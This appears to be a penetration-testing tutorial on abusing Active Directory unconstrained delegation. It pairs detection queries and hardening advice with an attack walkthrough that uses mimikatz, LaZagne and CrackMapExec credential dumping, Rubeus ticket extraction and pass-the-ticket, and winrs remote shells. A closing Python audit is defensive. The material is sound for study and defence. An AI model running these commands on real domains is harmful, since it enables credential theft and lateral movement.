AD DS - UnConstrained Delegation

ALi3nW3rX

Here is a brief explanation of unconstrained delegation in Active Directory:

Unconstrained delegation is an Active Directory setting (the TRUSTED_FOR_DELEGATION flag on a computer or service account) that lets that account impersonate any user who authenticates to it. When an account is configured for unconstrained delegation, it receives a copy of each authenticating user's ticket-granting ticket (TGT) and can access resources on their behalf without ever needing their password.

How it works:

  • A user logs on and obtains a ticket-granting ticket (TGT) from the domain controller, then authenticates to the service with Kerberos by requesting a service ticket for the service's SPN.

  • Because the service account is trusted for delegation, the domain controller sets the OK-AS-DELEGATE flag on that service ticket. The user's Kerberos client then requests a forwarded TGT and sends it to the service together with the service ticket. This is the credential delegation step.

  • The service extracts the forwarded TGT and caches it in LSASS. With it, the service can ask the domain controller for a service ticket to any resource on the network, as that user.

  • The service presents those service tickets to other hosts and is granted whatever access the user has.

Abusing Unconstrained Delegation

Detection:

# AD-Module
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# PowerView
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
Get-DomainComputer -Unconstrained | select -ExpandProperty dnshostname

# ADSearch.exe
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

Attack:

Note: you will need to be local admin on the machine you are on first, so you can dump the hashes of the users logged on to it. You will need the RC4/NTLM hash or the AES256 hash of a domain-joined user for this attack to work properly.
# First you need to dump hashes with a tool like mimikatz, LaZagne or CrackMapExec
LaZagne.exe all
Mimikatz.exe sekurlsa::logonpasswords
cme smb <target> -u 'Administrator' -p '@dminPassw0rd' --sam  # <target> is a placeholder for the host to dump from

# After you have retrieved the local admin hash you can perform the attack
# All you need is a TGT from the user or machine that has unconstrained delegation set
# My preferred tool for the rest of the attack is Rubeus.exe

1. Obtain the TGT
Rubeus.exe triage # This lists all the TGTs currently cached. If one for the wanted user is not there we can use asktgt
Rubeus.exe dump /luid:0x347 /nowrap # This extracts the TGT for the logon session (LUID) found with triage
Rubeus.exe asktgt /user:username /rc4:41968434196465316847321984879 /nowrap # This will attempt to obtain a TGT from the DC using the user's hash

2. Inject the TGT into our current session using PTT (pass-the-ticket)
# simply copy and paste the base64-encoded ticket into the command below.
Rubeus.exe ptt /ticket:doIFXasdf548a796dfs674a96sd.....

3. You should now be able to winrs or Enter-PSSession into the new machine.
winrs -r:machine.company.local cmd
Enter-PSSession -ComputerName machine.company.local

Risks:

  • Unconstrained delegation gives the service account very broad access. If the host is compromised, an attacker can reuse every cached TGT and impersonate any user who has authenticated to it.

  • It can be abused to gain unauthorized access to resources and to escalate privileges, especially when a privileged user authenticates to the host.

  • It is recommended to avoid unconstrained delegation where possible and instead use constrained delegation, which limits delegation to specified services.

Best practices:

  • Audit the computer and service accounts enabled for unconstrained delegation and limit its use; mark highly privileged accounts as "Account is sensitive and cannot be delegated" or add them to the Protected Users group, so their TGTs are never forwarded to such hosts.

  • Monitor account usage to detect misuse.

  • Use privileged access management to control the accounts.

  • Implement authentication policies and silos (which build on Kerberos armoring) to restrict where privileged accounts may authenticate and to prevent ticket misuse.
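
As an added example that is not part of the original post, here is a Python audit that reproduces the Detection checks (the 524288 userAccountControl bit and the primaryGroupID test) and the "cannot be delegated" best practice offline, over exported attribute values; the host and user names and the rec helper are constructed for illustration:

```python
# Added example (not the original post's code): offline audit of exported AD
# attributes. Mirrors the Detection filter (userAccountControl bit 524288 via
# matching rule 1.2.840.113556.1.4.803, primaryGroupID) and the Best-practices
# "cannot be delegated" control. All records below are constructed samples.
TRUSTED_FOR_DELEGATION = 0x80000  # 524288: unconstrained delegation enabled
NOT_DELEGATED = 0x100000          # "Account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000     # set on domain controller computer accounts
DC_PRIMARY_GROUPS = {516, 521}    # Domain Controllers / Read-only DCs RIDs
PROTECTED_USERS = "Protected Users"  # members' TGTs are never forwardable

def has_flag(uac, flag):
    return uac & flag == flag  # same AND test the LDAP bitwise matching rule does

def unconstrained_hosts(records, include_dcs=False):
    """Computers with unconstrained delegation; DCs always have it, so they are skipped unless include_dcs."""
    hits = []
    for r in records:
        uac = r["userAccountControl"]
        if r["objectCategory"] != "computer" or not has_flag(uac, TRUSTED_FOR_DELEGATION):
            continue
        is_dc = r["primaryGroupID"] in DC_PRIMARY_GROUPS or has_flag(uac, SERVER_TRUST_ACCOUNT)
        if include_dcs or not is_dc:
            hits.append(r["sAMAccountName"])
    return hits

def delegatable_privileged_users(records, privileged):
    """Privileged users whose TGT could still be forwarded: NOT_DELEGATED clear and not in Protected Users."""
    exposed = []
    for r in records:
        if r["objectCategory"] != "person" or r["sAMAccountName"] not in privileged:
            continue
        protected = (has_flag(r["userAccountControl"], NOT_DELEGATED)
                     or PROTECTED_USERS in r.get("memberOf", []))
        if not protected:
            exposed.append(r["sAMAccountName"])
    return exposed

def rec(name, category, uac, pgid, member_of=()):
    return {"sAMAccountName": name, "objectCategory": category,
            "userAccountControl": uac, "primaryGroupID": pgid, "memberOf": list(member_of)}

# Constructed sample export (hypothetical hosts and users)
SAMPLE = [
    rec("DC01$", "computer", 0x82000, 516),   # DC: SERVER_TRUST + TRUSTED_FOR_DELEGATION
    rec("WEB01$", "computer", 0x81000, 515),  # member server with unconstrained delegation
    rec("FS01$", "computer", 0x1000, 515),    # ordinary member server
    rec("administrator", "person", 0x200, 513),
    rec("svc_backup", "person", 0x100200, 513),             # NOT_DELEGATED set
    rec("da_user", "person", 0x200, 513, [PROTECTED_USERS]),
]
```

Running unconstrained_hosts(SAMPLE) on the sample reports only WEB01$ (DC01$ is dropped as a domain controller), and delegatable_privileged_users flags administrator as the one privileged account whose TGT would still be forwarded to it.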
